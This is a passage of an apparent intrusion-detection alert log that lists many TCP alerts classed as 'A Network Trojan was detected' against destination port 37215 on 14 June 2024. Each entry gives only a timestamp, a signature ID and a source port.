                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715105
                SID:2829579
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470436
                SID:2835222
                Source Port:54126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689482
                SID:2829579
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779467
                SID:2829579
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057226
                SID:2835222
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970709
                SID:2835222
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452317
                SID:2829579
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932917
                SID:2835222
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343782
                SID:2835222
                Source Port:57104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999881
                SID:2829579
                Source Port:33000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366357
                SID:2829579
                Source Port:57914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663546
                SID:2829579
                Source Port:38536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274114
                SID:2835222
                Source Port:54692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275657
                SID:2829579
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011794
                SID:2835222
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053088
                SID:2835222
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722463
                SID:2835222
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792061
                SID:2835222
                Source Port:48558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324958
                SID:2829579
                Source Port:42036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011541
                SID:2829579
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323668
                SID:2835222
                Source Port:40454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411157
                SID:2835222
                Source Port:36882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091536
                SID:2835222
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111390
                SID:2835222
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615150
                SID:2829579
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086363
                SID:2829579
                Source Port:34332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503060
                SID:2835222
                Source Port:33778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989589
                SID:2835222
                Source Port:57816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618573
                SID:2829579
                Source Port:53904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323764
                SID:2835222
                Source Port:52256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676961
                SID:2829579
                Source Port:58796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668648
                SID:2829579
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453562
                SID:2835222
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365007
                SID:2829579
                Source Port:34488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684365
                SID:2835222
                Source Port:46658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565668
                SID:2829579
                Source Port:35772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715591
                SID:2829579
                Source Port:55554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084813
                SID:2829579
                Source Port:40394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148369
                SID:2835222
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643594
                SID:2829579
                Source Port:35694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519042
                SID:2829579
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671561
                SID:2835222
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451391
                SID:2835222
                Source Port:33112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411072
                SID:2829579
                Source Port:53928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967097
                SID:2829579
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702010
                SID:2829579
                Source Port:52058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805814
                SID:2829579
                Source Port:52446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661612
                SID:2829579
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501141
                SID:2835222
                Source Port:32860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850615
                SID:2835222
                Source Port:50150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647314
                SID:2835222
                Source Port:49780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904648
                SID:2835222
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276795
                SID:2835222
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342985
                SID:2829579
                Source Port:53956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980016
                SID:2829579
                Source Port:53334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021081
                SID:2829579
                Source Port:48234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998010
                SID:2829579
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132863
                SID:2829579
                Source Port:60280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019614
                SID:2835222
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660977
                SID:2835222
                Source Port:48698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858384
                SID:2835222
                Source Port:41290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715563
                SID:2829579
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518941
                SID:2835222
                Source Port:47618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763296
                SID:2835222
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033370
                SID:2835222
                Source Port:44772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669030
                SID:2835222
                Source Port:34998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022346
                SID:2835222
                Source Port:32990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014753
                SID:2835222
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846742
                SID:2829579
                Source Port:56548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906551
                SID:2829579
                Source Port:49730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761320
                SID:2835222
                Source Port:46404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410871
                SID:2835222
                Source Port:39430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407666
                SID:2829579
                Source Port:52940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011732
                SID:2835222
                Source Port:49422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229367
                SID:2835222
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705425
                SID:2829579
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368945
                SID:2829579
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779329
                SID:2835222
                Source Port:35044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987994
                SID:2835222
                Source Port:48918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563777
                SID:2829579
                Source Port:34286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521650
                SID:2835222
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969206
                SID:2835222
                Source Port:36542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943995
                SID:2835222
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133642
                SID:2829579
                Source Port:38632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501381
                SID:2835222
                Source Port:55928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913946
                SID:2829579
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369329
                SID:2835222
                Source Port:46830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547368
                SID:2829579
                Source Port:35986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326199
                SID:2829579
                Source Port:53550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001747
                SID:2835222
                Source Port:43978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789315
                SID:2829579
                Source Port:51340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643387
                SID:2835222
                Source Port:35862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070697
                SID:2835222
                Source Port:51600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761607
                SID:2835222
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663553
                SID:2835222
                Source Port:48016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811652
                SID:2835222
                Source Port:58100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133147
                SID:2835222
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808782
                SID:2829579
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181932
                SID:2835222
                Source Port:49494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029735
                SID:2829579
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051125
                SID:2835222
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411350
                SID:2829579
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276143
                SID:2829579
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932448
                SID:2829579
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087997
                SID:2829579
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075140
                SID:2829579
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071819
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149130
                SID:2829579
                Source Port:33210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146503
                SID:2835222
                Source Port:36600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029256
                SID:2835222
                Source Port:46040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548320
                SID:2829579
                Source Port:44746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253038
                SID:2829579
                Source Port:47246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000256
                SID:2835222
                Source Port:60264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250795
                SID:2829579
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383559
                SID:2829579
                Source Port:41920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804692
                SID:2829579
                Source Port:55128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686611
                SID:2829579
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618666
                SID:2829579
                Source Port:57780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616807
                SID:2829579
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914028
                SID:2835222
                Source Port:57444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229717
                SID:2835222
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980147
                SID:2835222
                Source Port:44736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145616
                SID:2829579
                Source Port:57956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716153
                SID:2829579
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857840
                SID:2829579
                Source Port:59218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045863
                SID:2835222
                Source Port:51138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342833
                SID:2835222
                Source Port:42838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917334
                SID:2829579
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275490
                SID:2835222
                Source Port:50488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198926
                SID:2829579
                Source Port:57938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012865
                SID:2829579
                Source Port:47902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984650
                SID:2835222
                Source Port:54320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617653
                SID:2835222
                Source Port:46992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942482
                SID:2835222
                Source Port:51266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032201
                SID:2835222
                Source Port:46174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682950
                SID:2829579
                Source Port:35682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775951
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160255
                SID:2835222
                Source Port:45764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643666
                SID:2835222
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022842
                SID:2829579
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074427
                SID:2835222
                Source Port:60146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027845
                SID:2835222
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164672
                SID:2835222
                Source Port:44726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145875
                SID:2829579
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549564
                SID:2835222
                Source Port:34004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225826
                SID:2829579
                Source Port:59098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472026
                SID:2829579
                Source Port:37074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678162
                SID:2829579
                Source Port:56648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320870
                SID:2829579
                Source Port:38224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683750
                SID:2829579
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470308
                SID:2835222
                Source Port:52386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915208
                SID:2829579
                Source Port:56328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998572
                SID:2829579
                Source Port:34054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055414
                SID:2835222
                Source Port:52018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717397
                SID:2829579
                Source Port:52464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643877
                SID:2835222
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200711
                SID:2829579
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227542
                SID:2835222
                Source Port:39678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546633
                SID:2835222
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761778
                SID:2829579
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718979
                SID:2835222
                Source Port:36070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013667
                SID:2829579
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688376
                SID:2829579
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225734
                SID:2835222
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715987
                SID:2835222
                Source Port:34100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780013
                SID:2835222
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916548
                SID:2829579
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001695
                SID:2835222
                Source Port:41752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012835
                SID:2829579
                Source Port:52096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030122
                SID:2829579
                Source Port:52048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504467
                SID:2835222
                Source Port:34996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289291
                SID:2829579
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861229
                SID:2829579
                Source Port:34982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321886
                SID:2835222
                Source Port:36234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520730
                SID:2829579
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614514
                SID:2829579
                Source Port:33828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778239
                SID:2835222
                Source Port:53528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616699
                SID:2835222
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012536
                SID:2835222
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703677
                SID:2835222
                Source Port:54396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882774
                SID:2829579
                Source Port:57072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614009
                SID:2835222
                Source Port:47138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133340
                SID:2835222
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055878
                SID:2835222
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733563
                SID:2835222
                Source Port:51408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942415
                SID:2835222
                Source Port:41970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848536
                SID:2835222
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761513
                SID:2835222
                Source Port:52344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021821
                SID:2829579
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915815
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977372
                SID:2829579
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790640
                SID:2829579
                Source Port:49344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323541
                SID:2829579
                Source Port:46216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644391
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882246
                SID:2829579
                Source Port:33720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947315
                SID:2829579
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917151
                SID:2829579
                Source Port:40922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
